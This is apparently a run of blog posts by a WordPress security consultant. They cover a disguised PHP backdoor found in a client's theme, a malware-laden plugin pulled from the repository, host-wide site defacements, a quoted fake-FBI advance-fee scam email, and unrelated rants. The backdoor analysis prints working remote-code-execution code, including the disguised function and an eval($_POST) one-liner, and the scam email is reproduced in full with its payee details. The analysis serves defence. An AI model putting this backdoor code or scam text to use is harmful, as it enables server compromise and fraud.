The file was dropped into the theme that the client is using, and is coded to mimic a core WordPress file, using some of the same function names and coding conventions that WordPress itself uses. It is designed so that most people opening it and actually looking at the code would still not notice that it was anything malicious. I have seen enough back doors though that even creative ones will often stand out to me. It is definitely not something that would be picked up with any of the existing scripted scans out there. While of course someone can update their plugins or scripts to include specific strings to look for that this file contains, the exact variable names and other text in the file could be modified easily enough, even in an automated per-hack basis, so that while the updated scripts would find any instances of this backdoor that I found, they would miss any and all variations of it.

The relevant bits of the code include lines 14 & 15, 47 & 48, and 71 through 77. The rest of the code is misdirection, placed there to cover the tracks of those 11 lines. Lines 14 & 15 look like such:

14
15

if ( empty($_POST) && defined('DOING_AJAX') || defined('DOING_CRON') )
	die();

Since this file is not using include() or require() to tie into any of the core WordPress files, neither defined(‘DOING_AJAX’) nor defined(‘DOING_CRON’) will ever return “true”, so the only actual check here is to see if there are any POST parameters being passed in. If so, continue on, and if not then simply die() (halt execution of the script). Lines 16 through 46 set a constant that never gets used, a function that never gets called, and an if statement that always returns false (but is set to look like it is supposed to load WordPress). The next bit of code that actually does anything are lines 47 & 48:

47
48

if ( false === $crons = _get_cron_array() )
	die();

While this statement may appear to be innocuous enough, what it actually does is set a dummy variable to the output of a function, and if that result is false, die(). The sneaky bit is that by setting the variable it actually causes the function to process, and since the function doesn’t return a value the if statement always evaluates to false. Thus the entire active bits of the script are: check if there are POST parameters, and if so, call this one function, and then end the script.

The function in question, which in this script is named _get_cron_array() and shares the same name as a core WordPress function (but could in fact be named anything), is on lines 71 through 77:

71
72
73
74
75
76
77

function _get_cron_array()
{
	$info = array_merge($_REQUEST,$_COOKIE);
	if ( !isset($info['lng']) ) die( 'Restricted access' );
	else $info['feed']($info['file'], $info['link'].'"'.
	$info['lng'].'"'.$info['title'], $info['file'][1]);
}

What this does is merges all of the REQUEST variable (eg. POST and GET) with the COOKIE variables into a single array named $info, and checks for the existence of one named “lng”. If it doesn’t exist then just stop there, but if it does then treat one named “feed” as a function, with ones name “file”, “link”, “lng”, “title”, and assuming “file” is an array, the second element of “file”, all as parameters that are passed into that function. The upshot of this is that they can pass in any php function whatsoever in the parameter named “feed”, and the script will execute it on the server. For example, if the following query string were passed into this script:

feed=file_put_contents&file=t0ast.php&link=

It would then create a script on the server named t0ast.php, with the following contents:

1

<?php echo "success"; ?>

Of course, I am sure what the hackers passed in was not quite as harmless as this example. This script is a variation of the shortest backdoor that I have ever encountered, which I still see in use occasionally at the top of sites that have been hit:

1

<?php eval($_POST['asc']; ?>

That code does essentially the same thing, allowing arbitrary php code to be executed on the server (ie. it is an RCE, or Remote Code Execution, exploit). The shorter code, however, is easily detected, even with variations. This new script, however, is not. This is why I strongly advocate a complete rebuild of your site if you happen to get hit by hackers, since there are so many ways to hide malicious code in the WordPress framework. By deleting the entire installation and replacing all of the core files and plugins with fresh copies, retaining only the theme and uploads folders, it greatly reduces the amount of code that needs to be examined by hand, which makes it much easier to find stuff like what I outlined here.

If you have been hit, and you are not comfortable following my WordPress cleaning guide yourself, I am available for hire. Simply fill out my contact form letting me know the details of what is going on, and I will get back to you as soon as possible.

Wrong.

The day before yesterday I rebuilt a client’s site that had ben hacked, grabbing fresh versions of all of the plugins he was using. I noticed that one of the plugins, Social Media Widget, didn’t download though, and when I went to investigate why I saw that it had been yanked from the WordPress repositories. Checking Google’s cache I could tell that it had only recently been removed, that the old download button still worked, and there were no warnings or messages as to why it was pulled anywhere I looked. I went ahead and grabbed a fresh copy, then posted on the support forums (which also gave no clues as to why it was gone) asking what was up with it:

http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed

A few hours later I got my answer: the plugin was infected with malware, so they had removed the plugin page altogether. According to Samuel Wood (Otto), one of the WordPress devs, they “forced an update” of the plugin to a version that they fixed:

Two things struck me as wrong about this. First, WordPress cannot “force” an update of a plugin to the users themselves, so Otto’s claim was misleading at best. They can only update the svn, which then let’s the user know that there is an update available (assuming that they log in to their dashboard of course). If the users do not see the update, or do not have reason to believe that there is an urgent reason to run it, then it will remain on their installations until they do. To give you an idea of how ineffectual that tactic is, if one relies solely on that for protecting the infected blogs, here is a screenshot of the distribution of the various active versions of the plugin from back on March 28th:

This shows that less than 10% of the almost 1 million users had upgraded to the most recent version of the plugin, which had been out for a month when this data was collected.

Second, why is it that until I actually posted this question, no word about this infected plugin was mentioned by WordPress? There was nothing on the WordPress.org blog, nothing on Twitter from any of the developers, nothing on the plugin’s support forum, and of course, aside from letting me know that there was an update, nothing in the WordPress dashboard, not even when I clicked on the “View version 4.0.1 details” link in my plugins screen:

In fact, the only place you will see any information related to this malware is if you run the update, navigate to the folder for the plugin, open the readme.txt in there, and scroll down to line 181:

== Changelog ==

= 4.0.1 =

* Remove potentially malicious code.

And that’s the extent of what WordPress feels is necessary to warn it’s users that there was a exploited plugin that was distributed from the official plugin repositories. This isn’t one of those obscure, rarely used plugins, either. Before being yanked this plugin had been downloaded 940,776 times. Currently the remote file that was being included in the plugin merely contained some spam, and associated Javascript to hide the spam from normal view, but since the remote file itself is under control of someone who obviously is not brimming over with moral fortitude there is nothing saying that they couldn’t decide just as easily to swap the file out for something that spreads viruses. In such a case that would mean that everyone still unaware that they are hosting an infected plugin would suddenly be serving viruses to their audience. If you ask me the fact that there is a chance that could happen should be enough to put out a tad bit more of an alert than a single line in a reademe.txt that the majority of people will never read. WordPress, however, doesn’t seem to feel that way.

Even more disconcerting is what I found out a little bit after that. Once I got my answer in the thread I opened, Sucuri blogged about it, and Samuel left a few comments there as well, where he used the phrase “Normally in these cases” when referring to this incident:

This tells me that, regardless of how rare it happens, it appears to be WordPress’s policy that when an infected or compromised plugin makes it’s way into the repositories they quietly clean it up without any fanfare. Often times, unfortunately, this would be like closing the proverbial barn door after the horses got out, and stronger measures may be necessary (up to and including rebuilding the whole installation in some cases). The WordPress plugin repositories are supposed to be a trusted source. Not being more forthcoming when something like this happens borders on negligence, to put it bluntly.

I understand that in years past WordPress had quite the reputation as being a security risk, and that there is a certain amount of bad press associated with being upfront about incidents such as this. However, I hope that WordPress will eventually decide that potential public safety risks outweigh not wanting to look bad, will do the right thing, and will change their policies about publicly letting people know when these things happen.

and in HostPapa’s case they are even trying to blame it on WordPress:

Isn’t it nice the way they are able to determine that it is a WordPress issue, without even knowing which site it is? These styles of hacks, which usually have a specific hacker’s tag or signature rather than just “hacker”, often indicate to me that something other than a standard scripting exploit is at play. Whenever I see a site hit with a similar defacing hack, the first thing I do is check to see if there are other sites affected on the same host.

Warning: I am on Linux, which is unaffected by viruses that can affect Windows users. Unless you are on Linux or a Mac you should exercise extreme caution when looking for hacked sites, even if you have up to date antivirus software installed.

The way I check is I ping the infected domain in order to get the IP address, which in this case was srv03.netregistry.net (180.235.128.204), which I then plug into Bing using their “ip:” advanced search option (search by IP), plus the phrase “powered by WordPress”:

http://www.bing.com/search?q=ip%3A180.235.128.204+%2B%22powered+by+Wordpress%22

Clicking through those results I could easily see that this was far from isolated, and by using Bing’s cache I was able to determine that many of these sites were in fact up to date running the latest WordPress version before getting hit. I then tried several other of their servers (srv01.netregistry.net, srv02.netregistry.net, and srv04.netregistry.net), all with the same result. I sent them a tweet letting them know that they appeared to have an issue, and they replied, as shown in the screenshot above, that they were able to “confirm there’s been no server security breaches”. I then gave them examples of 15 identical hacks across 4 different servers of theirs here, here, here, and here. As of yet they have not bothered to reply to those tweets.

While I was in the midst of investigating Netregistry, someone else contacted me with the exact same hack, only their site was hosted with HostPapa. Going through the same process (as well as checking with recent forum posts from people with these symptoms) I checked hp82.hostpapa.com (76.74.128.200), hp78.hostpapa.com (76.74.128.160), and hp86.hostpapa.com (76.74.242.140), and found the same issues with all of them. Regardless of the evidence, however, HostPapa is still insisting that this is a WordPress issue:

There are a few issues with them trying to blame this on WordPress. First off, if this were an issue affecting WordPress installations that were up to date with the latest (which is 3.4.2, which quite a few of these sites were running), then it would be much, much more widespread, and it would not be isolated to just these two hosts. Secondly, if this were a WordPress issue then why was I able to find at least 1 Joomla site on HostPapa with the exact same hack?

I let HostPapa know this via a tweet, but they were uninterested in addressing that. Instead they seem more intent on blaming it on WordPress, telling their clients that they don’t help with hacking issues, and pretending that everything is fine. Just because a slew of sites that get hacked on a server are all running WordPress does not make it a WordPress issue. WordPress is a database driven platform, and is the most popular one out there. If a hacker locates a MySQL based exploit on a given host then the fastest ways to find a large number of sites to target would be to do searches similar to the ones I did above and aim for the WordPress ones. I am guessing this is actually what happened here, and it is obvious that this isn’t some 0-Day WordPress exploit (like both HostPapa and this idiot here are trying to claim).

Regardless of whether or not they eventually own up to it, if you are one of the unfortunates who happens to be hosting with either of these companies I would highly recommend you switch hosting, even if you are not one of the ones that got hacked. Again, I always recommend Hostgator, both for their security and for the fact that they happen to have better performing servers than many of the other hosts out there.

If you did get hit and you just want to get back up and running as fast as possible, luckily with the instances I saw this isn’t actually too difficult. While the next wave of hackers who come through might do more damage, at this point it seems to simply be a matter of replacing your root index.php with a fresh one from a clean WordPress install, and replacing either your index.php or header.php (or both) inside your theme using backups or clean downloads (assuming you have a readily downloadable copy of the theme you are using). I also saw some instances of people being unable to log in to the WordPress admin interface. The solution to that, as I described here, is to go in to your database through the phpmyadmin in cpanel and look at the wp_users table. If they switched the admin username and email, edit the record to switch it back and then go through the Lost Password function on the WP login page.

One thing to be careful of is that often times in cases like these the hackers will drop back doors on the sites, so that even once the host fixes the initial issue the hackers can just get right back in again later. If anyone has any issues where they keep getting hacked, even after moving to a new host, I am available to do professional cleanings. Feel free to contact me for more information. Also, Hostgator does offer free migrations in some instances, but if you have multiple or complex sites that you would like migrated to them I can assist with that as well (or to another host if you prefer, of course).

More resources:

How To Clean Hacked WordPress
WordPress FAQ: My site was hacked
How to find a backdoor in a hacked WordPress

1. Click on the picture below.
2. Click Like, then Share, then type the words “Show me” in the comments.
3. Watch and see what happens.

It would be interesting to see what arguments those who opposed the law come up with as well.

Here is the email in it’s entirety for your reading pleasure, as it came to me in an attachment actually named “warrant of arrest.txt”:

From: ROBERT S. MUELLER III, FBI DIRECTOR
Reply-to:
Subject: FINAL WARNING: YOU WILL BE ARRESTED AND JAILED IF YOU FAIL TO READ THE ATTACHED E-MAIL AND COMPLY
Date: Tue, 3 Jul 2012 08:25:13 -0700

Anti-Terrorist and Monetary Crimes Division
FBI Headquarters In Washington, D.C.
Federal Bureau Of Investigation
J. Edgar Hoover Building
935 Pennsylvania Avenue, NW Washington, D.C. 20535-0001

Attention: Beneficiary

This is the final warning you are going to receive from me, do you get me? I hope you understand how many times this message has been sent to you.

We have warned you so many times and you have decided to ignore our e-mails or because you believe we have not been instructed to get you arrested and today if you fail to respond back to us with the payment details below, then we would first send a letter to the MAYOR of the city where you reside and direct them to close your bank account until you have been jailed and all your properties will be confiscated by the FBI, CIA and other enforcement agency. We would also send a letter to the company/agency that you are working for so that they could get you fired until we are through with our investigations because a suspect is not supposed to be working for the government or any private organization.

Your ID which we have in our database have been sent to all the crimes agencies in America for them to inset you in their website as an internet fraudsters and to warn people from having any deals with you. This would have been solved all this while if you had gotten the CERTIFICATE ENDORSED AND STAMPED as you were instructed in the e-mail below. This is the federal bureau of investigation (FBI) am writing in response to the e-mail you sent to us and am using this medium to inform you that there is no more time left to waste because you have been given a mandate. As stated earlier to have the document endorsed, signed and stamped without failure and you must adhere to this directives to avoid you blaming yourself at last when we must have arrested and jailed you for life and all your properties will be seized and bank account will be confiscated too.

You failed to comply with our directives/instruction and that was the reason why we didn’t hear from you, as our director has already been notified about you get the process completed yesterday and right now the WARRANT OF ARREST has been signed against you and it will be carried out in the next 48hours as strictly signed by the FBI director. We have investigated and found out that you didn’t have any idea when the fraudulent deal was committed with your information’s/identity and right now your ID is placed on our website as a wanted person, I believe you know that it will be a shame to you and your entire family because after then it will be announce in all the local channels that you are wanted by the FBI.

As a good Christian and a Honest man, I decided to see how i could be of help to you because i would not be happy to see you end up in jail and all your properties confiscated all because your information’s was used to carry out a fraudulent transactions, i called the EFCC and they directed me to a private attorney who can help you get the process done and he stated that he will endorse and stamp the document at the sum of $98 usd only and i believe this process is cheaper for you.

You need to do every possible thing today and tomorrow to get this process done because our director has called to inform me that the warrant of arrest has been signed against you and once it has been approved, then the arrest will be carried out, and from our investigations we learnt that you were the person that forwarded your identity to one impostor/fraudsters in Nigeria when he had a deal with you about the transfer of some illegal funds into your bank account which is valued at the sum of $10,500,000.00 only.

I pleaded on your behalf so that this agency could give you till 06/06/2012 so that you could get this process done because i learnt that several e-mails has been sent to you without getting a response from you. Bear it in mind that this is the only way that i can be able to help you at this moment or you would have to face the law and its consequences once it had befallen on you. You would make the payment through western union money transfer with the below details.

NAME: DURU VINCE
ADDRESS: LAGOS, NIGERIA
TEXT QUESTION: BETTER
ANSWER: BEST
AMOUNT: $98
Senders Full Name:
Sender Full Address:
Direct Phone Number:
MTCN:

Send the payment details to me as stated above and make sure that you didn’t hesitate making the payment down to the agency by today so that they could have the certificate endorsed, signed and stamped immediately without any further delay. After all this process has been carried out, then we would have to proceed to the bank for the transfer of your compensation funds which is valued at the sum of $10.500,000.00 usd which was supposed to have been transferred to you all this while.

Note: All the crimes agencies have been contacted on this regards and we shall trace and arrest you if you disregard this instructions. You are given a grace today to make the payment for the document after which your failure to do that will attract a maximum arrest and finally you will be appearing in court for act of terrorism, money laundering and drug trafficking charges, so be warned not to try anything funny because you are been watched.

Expecting your anticipated- Co-operation.

Yours in service,

Robert S. Mueller
FBI DIRECTOR

I really wish I had the time to engage these guys in a fuller discussion about my options to stay out of jail, but since I don’t if anyone else wants to take a stab at it, feel free.

Controlled Substances: Adds to list of Schedule I controlled substances certain specified materials, compounds, mixtures, or preparations that contain hallucinogenic substances or that contain any of these substances’ salts, isomers, & salts of isomers – Florida HB 1175

For those who don’t know, substance in Schedule I are classified as follows:

 (1) Schedule I.
  (A) The drug or other substance has a high potential for abuse.
  (B) The drug or other substance has no currently accepted medical use in treatment in the United States.
  (C) There is a lack of accepted safety for use of the drug or other substance under medical supervision.
   No prescriptions may be written for Schedule I substances, and such substances are subject to production quotas by the DEA.

So obviously substances in this category are some serious shit. The bill makes no bones about it either, and clearly states that:

The following substances are controlled in Schedule I: unless specifically excepted or unless listed in another schedule, any material, compound, mixture, or preparation that contains any quantity of the following hallucinogenic substances or that contains any of their salts, isomers, and salts of isomers, if the existence of such salts, isomers, and salts of isomers is possible within the specific chemical designation

So to be clear, that is any material, compound, mixture, or preparation that contains any quantity of any of the listed substances is now illegal, with no exceptions (you can’t even get items containing any of them by prescription). The biggest problem with this is that apparently no one who was involved in either writing or voting on the bill bothered to fact check the list of chemicals (which you can find in the full bill here). Number 66 on this list if substances that will land you in jail for possession of any amount is tyramine, chemical name 4-Hydroxyphenethylamine. A quick search reveals exactly what that is:

Tyramine (4-hydroxyphenethylamine; para-tyramine, mydrial or uteramin) is a naturally occurring monoamine compound and trace amine derived from the amino acid tyrosine. Tyramine occurs widely in plants and animals… Foods containing considerable amounts of tyramine include meats that are potentially spoiled or pickled, aged, smoked, fermented, or marinated (some fish, poultry, and beef); most pork (except cured ham); chocolate; alcoholic beverages; and fermented foods, such as most cheeses (except ricotta, cottage cheese, cream cheese and neufchatel cheese), sour cream, yogurt, shrimp paste, soy sauce, soy bean condiments, teriyaki sauce, tofu, tempeh, miso soup, sauerkraut, broad (fava) beans, green bean pods, Italian flat (Romano) beans, snow peas, avocados, bananas, pineapple, eggplants, figs, red plums, raspberries, peanuts, Brazil nuts, coconuts, processed meat, yeast, and an array of cacti. – a bunch of food that just got outlawed in Florida

On the bright side, the fact that anyone selling chocolate “commits a felony of the first degree” will make dieting that much easier.

Yes, we all know chocolate is addictive, but let’s face it, Halloween is going to suck this year for Florida’s kids.

No, really…

I think this may be a sign that I am watching too much The Walking Dead.

By the way, this would look great on you or your boyfriend/girlfriend on a t-shirt!

It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, that apparently Google has finally decided to say “fuck it”, make it easier on themselves, just remove the ability for anyone to report any violations of the program whatsoever, and allow the scammers to have a field day in the mean time.

While Google may want to give the impression to their stockholders and the public that they have both the search engine spam and advertising program cheaters fully under control, the truth is that they rely quite a bit on reports from the community and consumers for both spam and AdSense violations. For any spam that they find, Google asks people to submit a Google spam report. At this point they require that someone log in before actually filing the report itself. This makes sense, since it helps prevent people erroneously filing large amount of spam reports against their competitors. For the AdSense violations they supply a separate form that does not require a log in, titled simply Reporting a Violation – AdSense Help. Usually I don’t run into offending sites with AdSense on them that fill me with enough of a sense of civic duty where I feel compelled to actually fill out a report, but I happened to land on one such today that actually tricked me into clicking on an ad in such a way that it really did annoy me. The page I landed on was BigSiteofAmazingFacts How Much Does The Earth Weigh (yes, I was distracted by trivial shit again, don’t judge me), and in the right sidebar there was what appeared to be an embedded Youtube Video from Family Guy:

Still distracted (of course) I clicked Play on the video, only instead of playing it suddenly brought me to a site trying to sell me bras. So, thinking I must have missed the rather large video in the sidebar when I tried to click on it, I hit the back button… and noticed that suddenly the video was gone altogether, and where before I had seen 2 AdSense blocks and a video, now there were 3 AdSense blocks instead:

I hit refresh a few times but the video didn’t return. At that point I realized that it was actually a scam, so I cleared my cookies for that domain, hit refresh again, and viola, the “video” reappeared once again. At this point I was sufficiently irked that I actually decided I was going to report this asshole. It’s bad enough that a site with crap content like this is ranking #1 (the weight of the Earth is increasing each year from salt from the ocean spray? Seriously, wtf?), while people with content that is just fine are getting penalized supposedly from the Panda fallout. To add in that the guy who owns the site is ripping off advertisers as well just makes it so much worse. So, I headed on over to the AdSense Violation report to be a good citizen… and I was greeted by this:

An essentially blank page, with only a header, navigation, and a box asking me to tell AdSense how they can improve. Go figure.

From a financial perspective it does make sense for Google to make reporting AdSense violators more difficult, especially during the holidays. People who run scams like this actually generate Google money through the AdSense program, a program which currently has absolutely no oversight. It is exactly this lack of oversight that means that Google is the only one who knows how much, if any, of the advertising dollars are credited back to the advertisers once these scams are revealed. Hiding the violations report means that much fewer sites will be reported, more scams will be able to run for longer periods of time, and more money will wind up in Google’s pockets.

Is this profit motive really the reason that the report form is missing? If you ask Google I am sure they would say “of course not, we’re Google, you can trust us”. And since everything with Google is proprietary “behind closed doors” trade secrets with them, there is no way to know exactly how many violation reports suddenly went missing that apparently no one has noticed yet. My hunch though is that with something like this, as online shopping hits the holiday rush, the lack of reports that are coming in at the moment is actually too big for them not to have noticed by now, and them not fixing it for this long must be at least in some part intentional on their end.

Update: As Jen from JenSense.com pointed out in the comments, there is another newer page available where you can actually file the report located here. However, I am not sure that makes it any better, and may in fact make it worse. I wound up on the empty page by actually going to Google and searching for [report adsense violation]. The page that Jen provided is in the list, but it is down under the blank page that I found, another unhelpful blank page, and underneath a list of discussion of other people looking for the form. This begs the question… why did Google leave an otherwise empty page behind with just enough text (ie. header and title) and all of the old link juice there to outrank the “real” form? If they redesigned the site, then why not 301 redirect the old form(s) to the new one? It’s not like they don’t know how search engines work, ya know?

“True Love means never giving up” – many a stalker were born from this one innocent sounding phrase.